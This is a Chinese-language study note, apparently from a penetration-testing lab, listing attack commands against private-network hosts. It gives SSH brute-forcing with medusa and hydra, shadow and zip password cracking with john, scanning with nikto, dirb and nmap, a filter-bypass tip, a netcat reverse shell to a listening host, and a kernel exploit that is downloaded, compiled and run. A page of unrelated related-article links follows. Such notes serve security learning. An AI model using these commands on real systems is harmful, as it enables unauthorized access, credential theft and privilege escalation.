当前位置: 首页 > news >正文

安防初识命令【学习笔记】

1、美杜莎爆破

medusa  -M  ssh   -h  192.168.42.135 -u guest  -P  top1000.txt   -t 8

2、passwd文件与shadow文件

root:x:0:0:root:/root:/usr/bin/zsh
用户名:密码:uid:gid:描述性信息:主目录:默认shell  (nologin为禁止登陆)

root:$y$j9T$qOgIxPawKD/eOVjjZBtAJ1$vHC6fSvBC3KDEINrK1u5Jb4Lgtv4NdMUGgXmUTl0l/A:19570:0:99999:7:::
用户名:
密码:
最近一次修改密码的时间(修改时间-1970/1/1的天数):
修改密码的间隔时间(在该时间段内不允许修改密码):
密码有效期:
密码过期前的警告提醒天数:
密码过期后宽限多少天:
账号失效时间:
保留字段

$1$     MD5
$y$    yescrypt
$5$    SHA256
$6$    SHA512

3、john解密

john  /etc/shadow  --format=crypt

zip压缩包密码解密
zip2john  test.zip > test_pass.txt

john test_pass.txt

4、web服务器扫描之nikto
nikto--------web安全扫描工具

nikto  -h http://192.168.42.141

dev_shell.php  php+mysql开源框架后台管理界面

/bin目录下存在大部分内核指令,可直接通过/bin/+命令绕过大多数简单的命令字符过滤

5、利用nc进行反弹shell

nc -lvp 6666  服务端开放并监听通信端口

nc -e /bin/bash  192.168.42.134 6666  客户端连接后启动shell

利用python模块让nc反弹shell 美化界面
python -c  “import pty;pty.spawn('/bin/bash')"        pty-----伪终端实用程序

6、gpg文件的解密

gpg --batch --passphrase  密钥 -d  需要解密的文件

gpg最简单的用法
gpg -o 解密后存储的文件 -d 需要解密的文件

7、dirb----web目录文件扫描

dirb  http://192.168.42.142

8、海德拉爆破

hydra  -l potato -P webshell.txt 192.168.42.142 -s 7120 -vV -f ssh

ssh potato@192.168.42.142 -p 7120

uname -a  发现版本较低

9、查找对应内核版本存在的漏洞

searchsploit   ubuntu 3.13.0
指定漏洞所在的路径

searchsploit  -p  37292.c

wget  http://192.168.42.133/37292.c

gcc 37292.c -o exp

chmod 777 exp

./exp

10、信息收集--永恒之眼

nmap  192.168.42.0/24

nmap  -A 192.168.42.142 -p-
 

http://www.lryc.cn/news/191817.html

相关文章:

  • idea 启动出现 Failed to create JVM JVM Path
  • 凉鞋的 Unity 笔记 108. 第二个通识:增删改查
  • angular项目指定端口,实现局域网内ip访问
  • 解决uniapp里scroll-view横向滚动的问题
  • LeetCode——动态规划(五)
  • 与HTTP相关的各种概念
  • CentOS 7 编译安装Boost
  • vue图表制作
  • 使用 GitHub Action 自动更新 Sealos 集群的应用镜像
  • windows频繁更新问题解决方案
  • day05-前后端项目上传到gitee、后端多方式登录接口、发送短信功能、发送短信封装、短信验证码接口、短信登录接口
  • 046:mapboxGL加载天地图路网图+标记(wmts方式)
  • 【ICer的脚本练习】tcl语法熟悉和工具tcl的实例
  • uniapp+vue3+ts+uview-plus搭建项目步骤
  • 在PHP中,可以使用不同的加密算法(如MD5、SHA1、SHA256)结合RSA算法进行公钥加密和私钥解密。
  • 第六章:路由交换机及操作系统
  • Kafka SASL认证授权(六)全方位性能测试
  • 基于nodejs+vue校园失物招领平台设计与实现
  • Open Winding-PMSM-开绕组永磁同步电机基本介绍
  • uniapp 一次性上传多条视频 u-upload accept=“video“ uni.chooseMedia uni.uploadFile
  • CentOS7卸载硬盘报错:umount: /data: target is busy.
  • Chrome插件精选 — 鼠标手势插件
  • JMeter分布式
  • [华为杯研究生创新赛 2023] 初赛 REV WP
  • C++中resize和reserve
  • 【面试经典150 | 哈希表】存在重复元素 II
  • Intellij 安装配置 lombok
  • Chrome插件精选 — 暗色主题插件
  • PXE解决uefi安装centos6黑屏问题
  • Feign 调用为何POST不支持同时传入多个SpringQueryMap对象,但是GET方法就支持?